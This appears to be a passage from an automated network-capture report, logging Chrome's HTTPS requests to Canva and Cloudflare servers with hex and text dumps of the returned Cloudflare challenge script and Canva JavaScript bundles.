                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 2c 4a 3d 33 2c 4b 3d 5b 5d 2c 4e 3d 46 28 30 29 2c 4f 3d 45 2c 50 3d 31 2c 4c 3d 30 3b 33 3e 4c 3b 47 5b 4c 5d 3d 4c 2c 4c 2b 3d 31 29 3b 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 34 37 31 29 5d 28 32 2c 32 29 2c 4d 3d 31 3b 4d 21 3d 52 3b 53 3d 4f 26 4e 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 51 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 34 37 31 29 5d 28 32 2c 38 29 2c 4d 3d 31 3b 52 21 3d 4d 3b 53 3d 4f 26 4e 2c 4f 3e 3e 3d 31 2c 30 3d 3d 4f 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c 3c 3d 31 29 3b 54 3d 65 28 51 29
                                                                                                                                                                                                                                                                    Data Ascii: ,J=3,K=[],N=F(0),O=E,P=1,L=0;3>L;G[L]=L,L+=1);for(Q=0,R=Math[a9(471)](2,2),M=1;M!=R;S=O&N,O>>=1,O==0&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<<=1);switch(Q){case 0:for(Q=0,R=Math[a9(471)](2,8),M=1;R!=M;S=O&N,O>>=1,0==O&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<<=1);T=e(Q)
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 2c 66 2c 67 29 7b 69 66 28 28 61 62 3d 56 2c 64 3d 68 5b 61 62 28 35 36 38 29 5d 2c 65 3d 33 36 30 30 2c 64 2e 74 29 26 26 28 66 3d 4d 61 74 68 5b 61 62 28 35 36 37 29 5d 28 2b 61 74 6f 62 28 64 2e 74 29 29 2c 67 3d 4d 61 74 68 5b 61 62 28 35 36 37 29 5d 28 44 61 74 65 5b 61 62 28 35 31 36 29 5d 28 29 2f 31 65 33 29 2c 67 2d 66 3e 65 29 29 72 65 74 75 72 6e 21 5b 5d 3b 72 65 74 75 72 6e 21 21 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 79 28 64 2c 61 61 29 7b 72 65 74 75 72 6e 20 61 61 3d 56 2c 4d 61 74 68 5b 61 61 28 35 32 39 29 5d 28 29 3c 64 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 67 2c 44 2c 58 2c 45 29 7b 58 3d 56 3b 74 72 79 7b 72 65 74 75 72 6e 20 67 5b 44 5d 5b 58 28 34 39 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 27 70 27 7d 63 61 74 63 68
                                                                                                                                                                                                                                                                    Data Ascii: ,f,g){if((ab=V,d=h[ab(568)],e=3600,d.t)&&(f=Math[ab(567)](+atob(d.t)),g=Math[ab(567)](Date[ab(516)]()/1e3),g-f>e))return![];return!![]}function y(d,aa){return aa=V,Math[aa(529)]()<d}function m(e,g,D,X,E){X=V;try{return g[D][X(499)](function(){}),'p'}catch
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 6e 20 41 28 64 2c 65 2c 61 63 2c 66 2c 67 29 7b 61 63 3d 56 2c 66 3d 7b 27 77 70 27 3a 78 5b 61 63 28 35 31 39 29 5d 28 4a 53 4f 4e 5b 61 63 28 35 33 38 29 5d 28 65 29 29 2c 27 73 27 3a 61 63 28 34 37 35 29 7d 2c 67 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 67 5b 61 63 28 35 35 30 29 5d 28 61 63 28 35 32 37 29 2c 61 63 28 35 34 38 29 2b 68 5b 61 63 28 35 32 35 29 5d 5b 61 63 28 35 36 31 29 5d 2b 61 63 28 35 36 35 29 2b 64 29 2c 67 5b 61 63 28 34 39 37 29 5d 28 61 63 28 35 33 30 29 2c 61 63 28 35 31 30 29 29 2c 67 5b 61 63 28 34 39 38 29 5d 28 4a 53 4f 4e 5b 61 63 28 35 33 38 29 5d 28 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 64 2c 59 2c 65 29 7b 66 6f 72 28 59 3d 56 2c 65 3d 5b 5d 3b 64 21 3d 3d 6e 75 6c 6c 3b 65 3d 65 5b 59 28
                                                                                                                                                                                                                                                                    Data Ascii: n A(d,e,ac,f,g){ac=V,f={'wp':x[ac(519)](JSON[ac(538)](e)),'s':ac(475)},g=new XMLHttpRequest(),g[ac(550)](ac(527),ac(548)+h[ac(525)][ac(561)]+ac(565)+d),g[ac(497)](ac(530),ac(510)),g[ac(498)](JSON[ac(538)](f))}function n(d,Y,e){for(Y=V,e=[];d!==null;e=e[Y(
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC651INData Raw: 44 54 58 2c 62 6f 64 79 2c 69 66 72 61 6d 65 2c 31 31 30 39 36 33 30 6a 48 4e 74 7a 69 2c 32 33 31 33 63 6e 5a 71 42 52 2c 73 74 72 69 6e 67 2c 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 2c 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 2c 61 70 70 65 6e 64 43 68 69 6c 64 2c 62 69 67 69 6e 74 2c 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 2c 6d 61 70 2c 65 72 72 6f 72 20 6f 6e 20 63 66 5f 63 68 6c 5f 70 72 6f 70 73 2c 36 33 35 37 33 36 32 6b 6e 44 48 76 48 2c 37 34 33 32 31 30 34 5a 69 61 70 4b 4e 2c 73 6f 72 74 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 4b 67 55 71 49 35 2c 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 6a 73 64 2c 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 2c 73 65 6e 64 2c 63 61 74 63 68 2c 41 72 72 61 79 2c 73 70 6c 69 74 2c
                                                                                                                                                                                                                                                                    Data Ascii: DTX,body,iframe,1109630jHNtzi,2313cnZqBR,string,getOwnPropertyNames,createElement,appendChild,bigint,contentDocument,map,error on cf_chl_props,6357362knDHvH,7432104ZiapKN,sort,fromCharCode,KgUqI5,hasOwnProperty,jsd,setRequestHeader,send,catch,Array,split,


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    68192.168.2.1249792104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1375OUTGET /chunk-batch/6adf981daf016320.js+ca6752412b124ab8.js+39a6195c40e885cb.js+d1746f2be639385d.vendor.js+e5858b9acd7eacfd.js+ac32d7d2559049fb.vendor.js+5c8428ff8946c2bc.vendor.js+8bb5c083c329cabd.vendor.js+f35481ca3aa7c0b1.vendor.js+7fa913dc41885224.js+a6f54230679b881b.js+4eea533da91b843b.js+68b4a56d49d06d5b.js+669a9c3f49529a1a.js+e0c33afc52136d6f.strings.js+f2ef215a4b1973ce.js+a4fa1dfb6c5bbab1.js+37310646f6c0cb67.js+470e84c5f0282c19.js+9020ba20c4c9bfa3.js+3153d733bc77daa7.js+916035f5f725fd3d.js+3e4a0f2f12f57b0a.js+927a6d6ab1e9b047.js+0551db2cd60e1299.js+adbadea387f83326.js+338f11e66f186039.js+2c6dd549e6f23a4d.js+4c2713f515715d55.js+14da071be375bc00.js+18acabe5ca80518c.js+5ca0a34b6e381def.js+eea9cc7d4f9eb5b6.js+2fdff918b6f47278.js+469a5a0d65ded138.js+2d9ada8959d4d1e3.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:43 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 796858
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512068921891-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49983
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:29 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:18 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: uonzfa1GT9wn9OmVvqIL9qBj6Lzziqrdw7XTg7E8FDfjK4QntKLPPHCTU6a8afeyHRTA5GRE6C8=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8YEFT0XPV3H1FS
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: o8RsUuOogsolGqNNba4_O_uDUV0K3UMF
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC362INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 74 68 52 4b 32 46 41 38 76 25 32 46 57 4a 6e 4a 53 57 34 53 6b 43 64 63 78 65 35 74 46 74 53 73 56 55 76 31 78 61 39 76 78 53 6a 43 6b 43 68 6b 48 78 47 37 6e 76 47 74 6e 36 36 39 68 71 56 44 4e 36 71 4f 42 6c 33 79 71 43 74 6c 49 48 59 57 4d 68 6a 59 65 78 73 6e 64 55 6a 62 51 5a 38 4e 57 45 68 34 6e 79 6a 4d 75 5a 30 69 31 77 78 36 52 66 6f 46 6b 30 30 25 32 46 32 4d 49 41 63 44 4f 39 71 36 79 56 42 49 44 71 44 4b 43 25 32 42 4b 4f 68 4b 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thRK2FA8v%2FWJnJSW4SkCdcxe5tFtSsVUv1xa9vxSjCkChkHxG7nvGtn669hqVDN6qOBl3yqCtlIHYWMhjYexsndUjbQZ8NWEh4nyjMuZ0i1wx6RfoFk00%2F2MIAcDO9q6yVBIDqDKC%2BKOhKg%3D"}],"group":"cf-nel","max
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1227INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 36 61 64 66 39 38 31 64 61 66 30 31 36 33 32 30 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 39 39 31 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 35 35 32 38 35 39 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:6adf981daf016320.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1991],{/***/ 552859:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 73 65 73 73 69 6f 6e 5f 69 64 3a 61 2e 6a 4f 62 2c 6e 61 76 69 67 61 74 69 6f 6e 5f 63 6f 72 72 65 6c 61 74 69 6f 6e 5f 69 64 3a 61 2e 67 74 2c 69 73 5f 64 65 73 69 67 6e 5f 6f 77 6e 65 72 3a 61 2e 50 65 61 2c 64 65 73 69 67 6e 5f 6f 77 6e 65 72 5f 75 73 65 72 5f 69 64 3a 61 2e 4b 31 2c 61 63 63 65 73 73 5f 72 6f 6c 65 3a 61 2e 57 64 2c 0a 76 69 65 77 5f 6d 6f 64 65 3a 61 2e 58 5a 2c 65 64 69 74 5f 6d 6f 64 65 3a 61 2e 70 50 62 2c 65 6d 62 65 64 64 65 64 5f 70 61 67 65 5f 73 6f 75 72 63 65 3a 61 2e 79 50 62 2c 70 6f 73 69 74 69 6f 6e 69 6e 67 3a 61 2e 62 66 2c 69 73 5f 70 72 6f 70 6f 72 74 69 6f 6e 61 6c 5f 73 63 65 6e 65 73 3a 61 2e 56 55 62 2c 73 65 6c 65 63 74 69 6f 6e 5f 74 79 70 65 3a 61 2e 6f 32 62 2c 73 65 6c 65 63 74 69 6f 6e 5f 63 6f 75 6e 74 3a
                                                                                                                                                                                                                                                                    Data Ascii: session_id:a.jOb,navigation_correlation_id:a.gt,is_design_owner:a.Pea,design_owner_user_id:a.K1,access_role:a.Wd,view_mode:a.XZ,edit_mode:a.pPb,embedded_page_source:a.yPb,positioning:a.bf,is_proportional_scenes:a.VUb,selection_type:a.o2b,selection_count:
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 69 74 68 28 22 2f 64 65 73 69 67 6e 2f 22 29 29 72 65 74 75 72 6e 20 61 3b 63 6f 6e 73 74 20 62 3d 61 2e 73 70 6c 69 74 28 22 2f 22 29 3b 69 66 28 34 3e 62 2e 6c 65 6e 67 74 68 7c 7c 44 70 61 2e 68 61 73 28 62 5b 33 5d 29 29 72 65 74 75 72 6e 20 61 3b 62 5b 33 5d 3d 22 2a 2a 2a 2a 2a 22 3b 72 65 74 75 72 6e 20 62 2e 6a 6f 69 6e 28 22 2f 22 29 7d 3b 5f 5f 63 2e 41 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 7c 7c 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 7c 7c 21 61 2e 73 74 61 72 74 73 57 69 74 68 28 22 3f 22 29 29 72 65 74 75 72 6e 20 61 3b 61 3d 61 2e 73 6c 69 63 65 28 61 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 2b 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 5b 62 5d 3d 62 2e 73 70 6c 69 74
                                                                                                                                                                                                                                                                    Data Ascii: ith("/design/"))return a;const b=a.split("/");if(4>b.length||Dpa.has(b[3]))return a;b[3]="*****";return b.join("/")};__c.Apa=function(a){if(!a||0===a.length||!a.startsWith("?"))return a;a=a.slice(a.indexOf("?")+1).split("&").filter(function(b){[b]=b.split
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 7b 73 6f 75 72 63 65 3a 61 2e 73 6f 75 72 63 65 2c 72 65 73 6f 75 72 63 65 5f 69 64 3a 61 2e 74 59 61 2c 73 75 63 63 65 73 73 3a 61 2e 73 75 63 63 65 73 73 2c 72 65 73 6f 75 72 63 65 5f 74 79 70 65 3a 61 2e 72 65 73 6f 75 72 63 65 54 79 70 65 2c 76 65 72 73 69 6f 6e 3a 61 2e 76 65 72 73 69 6f 6e 2c 75 72 6c 3a 5f 5f 63 2e 43 70 61 28 61 2e 75 72 6c 29 2c 77 61 74 65 72 6d 61 72 6b 65 64 3a 61 2e 72 61 2c 73 70 72 69 74 65 73 68 65 65 74 3a 61 2e 61 65 2c 68 65 69 67 68 74 3a 61 2e 68 65 69 67 68 74 2c 77 69 64 74 68 3a 61 2e 77 69 64 74 68 2c 71 75 61 6c 69 74 79 3a 61 2e 71 75 61 6c 69 74 79 2c 72 65 73 74 72 69 63 74 65 64 5f 61 63 63 65 73 73 3a 61 2e 5a 6e 2c 66 69 6c 65 5f 73 69 7a 65 3a 61 2e 66 69 6c 65 53 69 7a 65 2c 66 61 69 6c 75 72 65 5f 72 65
                                                                                                                                                                                                                                                                    Data Ascii: {source:a.source,resource_id:a.tYa,success:a.success,resource_type:a.resourceType,version:a.version,url:__c.Cpa(a.url),watermarked:a.ra,spritesheet:a.ae,height:a.height,width:a.width,quality:a.quality,restricted_access:a.Zn,file_size:a.fileSize,failure_re
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 5f 63 29 20 7b 76 61 72 20 76 6a 3b 76 61 72 20 46 73 61 2c 4e 73 61 2c 4f 73 61 2c 50 73 61 2c 51 73 61 3b 5f 5f 63 2e 73 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 5f 5f 63 2e 70 71 61 2c 62 3d 3e 5f 5f 63 2e 71 69 5b 62 5d 29 7d 3b 5f 5f 63 2e 74 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 30 3a 61 2e 72 65 71 75 65 73 74 49 64 29 3f 5f 5f 63 2e 59 68 28 22 4e 66 71 2f 66 41 22 2c 5b 5f 5f 63 2e 73 6a 28 61 2e 72 65 71 75 65 73 74 49 64 29 5d 29 3a 5f 5f 63 2e 4f 28 22 37 64 56 38 6a 67 22 29 7d 3b 5f 5f 63 2e 45 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                    Data Ascii: {};(function(__c) {var vj;var Fsa,Nsa,Osa,Psa,Qsa;__c.sj=function(a){return a.replace(__c.pqa,b=>__c.qi[b])};__c.tj=function(a){return(null===a||void 0===a?0:a.requestId)?__c.Yh("Nfq/fA",[__c.sj(a.requestId)]):__c.O("7dV8jg")};__c.Esa=function(a){return
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 69 6c 64 72 65 6e 3a 76 6a 28 5f 5f 63 2e 79 6a 2c 7b 73 68 61 70 65 3a 22 74 65 78 74 52 65 63 74 61 6e 67 6c 65 22 2c 69 6e 64 65 78 3a 63 7d 29 7d 29 7d 3b 0a 4f 73 61 3d 7b 72 61 64 69 75 73 45 6c 65 6d 65 6e 74 3a 22 38 70 78 22 2c 72 61 64 69 75 73 45 6c 65 6d 65 6e 74 52 6f 75 6e 64 3a 22 39 39 39 39 70 78 22 2c 63 6f 6c 6f 72 54 79 70 6f 67 72 61 70 68 79 50 72 69 6d 61 72 79 3a 22 76 61 72 28 2d 2d 56 4e 58 70 53 77 29 22 2c 74 68 65 6d 65 44 61 72 6b 3a 22 3a 67 6c 6f 62 61 6c 28 2e 64 61 72 6b 29 22 2c 74 68 65 6d 65 4c 69 67 68 74 3a 22 3a 67 6c 6f 62 61 6c 28 2e 6c 69 67 68 74 29 22 2c 66 6f 6e 74 53 69 7a 65 45 78 74 72 61 53 6d 61 6c 6c 3a 22 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 30 2e 31 72 65 6d 29 2a 31 31 29 22 2c 66
                                                                                                                                                                                                                                                                    Data Ascii: ildren:vj(__c.yj,{shape:"textRectangle",index:c})})};Osa={radiusElement:"8px",radiusElementRound:"9999px",colorTypographyPrimary:"var(--VNXpSw)",themeDark:":global(.dark)",themeLight:":global(.light)",fontSizeExtraSmall:"calc(var(--wQwVGw, 0.1rem)*11)",f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 6c 75 65 3b 61 2e 67 65 74 45 72 72 6f 72 3d 64 3d 3e 64 2e 65 72 72 6f 72 3b 61 2e 46 46 62 3d 28 29 3d 3e 28 7b 6b 69 6e 64 3a 30 7d 29 3b 61 2e 78 47 61 3d 28 29 3d 3e 28 7b 6b 69 6e 64 3a 31 7d 29 3b 61 2e 59 72 3d 64 3d 3e 28 7b 6b 69 6e 64 3a 32 2c 76 61 6c 75 65 3a 64 7d 29 3b 61 2e 71 62 3d 64 3d 3e 28 7b 6b 69 6e 64 3a 33 2c 65 72 72 6f 72 3a 64 7d 29 3b 76 61 72 20 62 3d 61 2e 6d 61 70 3d 28 64 2c 65 29 3d 3e 7b 73 77 69 74 63 68 28 64 2e 6b 69 6e 64 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 69 6e 69 74 69 61 6c 28 29 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 65 2e 6c 6f 61 64 69 6e 67 28 29 3b 63 61 73 65 20 32 3a 62 72 65 61 6b 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 65 2e 72 65 6a 65 63 74 65 64 28 64 2e 65 72 72 6f 72 29
                                                                                                                                                                                                                                                                    Data Ascii: lue;a.getError=d=>d.error;a.FFb=()=>({kind:0});a.xGa=()=>({kind:1});a.Yr=d=>({kind:2,value:d});a.qb=d=>({kind:3,error:d});var b=a.map=(d,e)=>{switch(d.kind){case 0:return e.initial();case 1:return e.loading();case 2:break;case 3:return e.rejected(d.error)
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 68 52 53 51 22 2c 7b 41 4f 45 73 6a 51 3a 22 76 65 72 74 69 63 61 6c 22 3d 3d 3d 61 7d 29 7d 29 3b 41 6a 28 28 7b 69 64 3a 61 2c 74 65 78 74 3a 62 2c 63 68 69 6c 64 72 65 6e 3a 63 7d 29 3d 3e 51 73 61 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 5f 31 5a 46 67 71 41 22 2c 69 64 3a 61 2c 63 68 69 6c 64 72 65 6e 3a 5b 76 6a 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 76 74 51 65 66 67 20 5f 35 4e 48 58 54 41 22 2c 63 68 69 6c 64 72 65 6e 3a 62 7d 29 2c 63 5d 7d 29 29 3b 76 61 72 20 47 73 61 3d 22 64 49 48 5f 46 51 20 7a 32 6f 5a 46 77 22 2c 48 73 61 3d 22 69 44 79 79 79 41 20 77 4c 36 76 71 51 22 2c 49 73 61 3d 22 79 62 79 65 67 67 20 5f 35 4a 67 53 49 51 22 2c 4a 73 61 3d 22 68 71 69 4d 74 77 20 5f 36 70 45 5f 64 51 22 2c 4b 73
                                                                                                                                                                                                                                                                    Data Ascii: hRSQ",{AOEsjQ:"vertical"===a})});Aj(({id:a,text:b,children:c})=>Qsa("div",{className:"_1ZFgqA",id:a,children:[vj("span",{className:"vtQefg _5NHXTA",children:b}),c]}));var Gsa="dIH_FQ z2oZFw",Hsa="iDyyyA wL6vqQ",Isa="ybyegg _5JgSIQ",Jsa="hqiMtw _6pE_dQ",Ks
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 33 2d 2e 36 2d 2e 32 2d 2e 31 2d 2e 35 20 30 2d 2e 36 2e 33 6c 2d 2e 36 20 31 2e 38 48 38 63 2d 32 2e 34 20 30 2d 34 2e 36 20 31 2e 31 2d 36 2e 36 20 33 2e 34 2d 2e 35 2e 35 2d 2e 35 20 31 2e 33 20 30 20 31 2e 38 20 31 2e 33 20 31 2e 36 20 32 2e 38 20 32 2e 36 20 34 2e 34 20 33 2e 31 6c 2d 2e 34 20 31 2e 34 63 2d 2e 31 2e 32 20 30 20 2e 35 2e 33 2e 36 2e 33 2e 31 2e 35 2d 2e 31 2e 36 2d 2e 34 6c 2e 35 2d 31 2e 34 2e 33 2d 2e 39 2e 31 2d 2e 34 7a 6d 2d 31 2e 31 2e 31 63 2d 31 2e 34 2d 2e 34 2d 32 2e 37 2d 31 2e 33 2d 34 2d 32 2e 38 61 2e 33 2e 33 20 30 20 30 20 31 20 30 2d 2e 34 43 34 20 35 2e 37 20 35 2e 39 20 34 2e 37 20 38 20 34 2e 37 6c 2d 2e 32 2e 36 43 36 2e 34 20 35 2e 34 20 35 2e 33 20 36 2e 36 20 35 2e 33 20 38 63 30 20 2e 39 2e 34 20 31 2e 36 20
                                                                                                                                                                                                                                                                    Data Ascii: 3-.6-.2-.1-.5 0-.6.3l-.6 1.8H8c-2.4 0-4.6 1.1-6.6 3.4-.5.5-.5 1.3 0 1.8 1.3 1.6 2.8 2.6 4.4 3.1l-.4 1.4c-.1.2 0 .5.3.6.3.1.5-.1.6-.4l.5-1.4.3-.9.1-.4zm-1.1.1c-1.4-.4-2.7-1.3-4-2.8a.3.3 0 0 1 0-.4C4 5.7 5.9 4.7 8 4.7l-.2.6C6.4 5.4 5.3 6.6 5.3 8c0 .9.4 1.6


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    69192.168.2.1249793104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC615OUTGET /web/c40487ebdc5035af.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:44 UTC1191INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:43 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 124787
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951259d270ce9-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
